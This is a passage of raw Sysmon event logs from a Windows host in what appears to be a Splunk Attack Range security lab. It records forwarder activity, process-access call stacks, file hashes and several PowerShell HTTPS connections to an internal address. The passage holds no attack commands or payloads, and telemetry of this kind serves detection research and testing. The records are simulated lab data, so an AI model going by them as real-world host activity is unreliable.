354300x800000000000000035083291Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:54.199{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56457-false10.0.1.12-8000- 23542300x800000000000000035083290Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:29.373{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=95A9DB9E63211794FF7273B8B834890A,SHA256=348694B5FBE218062F6F1EDA30DE85E1BB012EDEA3D2EA6BF71868605E54F4FB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083289Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:29.373{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A455D597D1F4ACF71ACDA51758849D9D,SHA256=CF923A29E0BF3F790F853E454E5CADA09A85EF7962C948BCCD759AC5AC49462B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083288Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:29.272{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=228E2BA85009A84C0C72C2B51356F662,SHA256=AAD49DBE4AA34963694227BE449D9711D27F2825EA8B02CEEA842EEED3C7111C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035083287Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:29.057{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4CAD-613A-0B90-03000000C801}6736C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083286Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:29.057{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083285Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:29.057{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083284Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:29.057{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083283Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:29.057{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083282Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:29.057{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-4CAD-613A-0B90-03000000C801}6736C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035083281Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:29.057{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4CAD-613A-0B90-03000000C801}6736C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035083280Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:29.042{B81B27B7-4CAD-613A-0B90-03000000C801}6736C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035083292Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:30.309{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EBAF6A5994319C898CDF40F3C8087872,SHA256=564A52ED8AFA87262EB403A5CC9ACB44C44661ED8ED6E46A9CFF2AB9BC5CEDBD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083293Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:31.339{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B1BF8696E436B14F4D67704D3D692F98,SHA256=5E8E6EABD7F113E207310AD39FDF10AB0B7B9CA381789AFD6F06981B295FA82C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083295Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:32.354{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7772D5F654D8B91DA8E577ADC6E9445,SHA256=B74B65293CFAC2BFD20761F51950642F00B6D4F1EB015A2387EE0B8E83C81CBB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083294Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:32.054{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=7577D29ECD4698ABF741F05313E04DEA,SHA256=B9887BC42DC19D419D1033AFAAC44C032CB7EA08672DE182883F4CCC867B7B0F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083296Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:33.386{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64844EA7FCDC81C807E8E8D19E4156EE,SHA256=19DFFDE1272158F9D51B7518CFCA88A07DFCA6B3E6B6E966E873D2C28B55EA15,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083298Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:34.436{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E4F02AB61BFE989BD86E88E0F043553F,SHA256=C7EF8F0ACA30E4B87243826C4E0F53B6C157D55AF00BD29006DB1BB561B41B47,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083297Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:56.997{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56458-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035083300Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:00.070{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56459-false10.0.1.12-8000- 23542300x800000000000000035083299Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:35.452{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E9BA00F8C2C82D95E1D9C67C9A9DBE5B,SHA256=877B7D6658BA59B64AB1FBC1A03FF2B294A92B8F1A2BDCE2CF768FED851191F5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083302Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:36.468{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C7854CA050420B0A51987AD9AE7B987,SHA256=9247D1ACBEAC8D904B8B781DA809F7C90C211B73B965D4FE76B70A29C4DC7E6C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083301Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:36.366{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=2CAB9202E04C68F19ACC051E8B9D7CE0,SHA256=DDBE2989E663366F7DEB54277981B6EF7B8B14E22C44D7B82A0054C17DD02A70,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083303Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:37.481{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0C2AA6C7D4C929059008CD958A9B72E,SHA256=D65DC29CFD6859243AFAB66D95380030F7C9622FB98B25F7FFEF5BBFC91356CA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083307Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:38.498{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=61B4A92880C189FC4415F42F1962A569,SHA256=99BA0F4B1FE84F89AB91C1710917EB0902BE12A124899563B8B09D2617E7D53C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083306Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:38.380{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083305Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:38.380{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=BF1BCB3220F3953EE34FBAB56DE179A3,SHA256=641F4FAEB140B868224A102F2501E3DDC4923F20F98ECDD9D2C07568B5FA35B6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083304Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:38.033{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=E427E882B858394F0E3CF600B8F108E2,SHA256=3D6591F41001DB30C9E6EA0340B356F51F4DC053064AE3737C715A82811C841A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083309Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:39.516{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F459EA3179CBB8E749E93CC1261B14F3,SHA256=3AB063C5698DBC60774FF06363E476A3CE76ED5E2FB840E33E8EEF624A46A67C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083308Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:03.008{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56460-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035083310Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:40.531{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=41C33B5D980103B25762EA910194F124,SHA256=D62FD8D78FC1216DC5E4CB29C225111EBFCB1A1CADCCC07D41AC17CF788B97E9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083312Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:41.546{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=940D8DEC6F53CB56099AF4B0695A8C35,SHA256=1A9F70960BF7D79A8D3EFCC5B6EC8E67FBD7806C019C164C87F10FAA9B50A362,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083311Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:05.090{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56461-false10.0.1.12-8000- 23542300x800000000000000035083313Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:42.560{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C06C8142527E01D863B34D54B0E35CD,SHA256=AB58E3CC88C321815677A1AC4333E520AF454633C95B7B162C76C0208EBDB7D7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035083322Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:43.859{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4CBB-613A-0C90-03000000C801}7004C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083321Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:43.859{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083320Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:43.859{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083319Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:43.859{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083318Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:43.859{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083317Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:43.859{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-4CBB-613A-0C90-03000000C801}7004C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035083316Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:43.859{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4CBB-613A-0C90-03000000C801}7004C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program 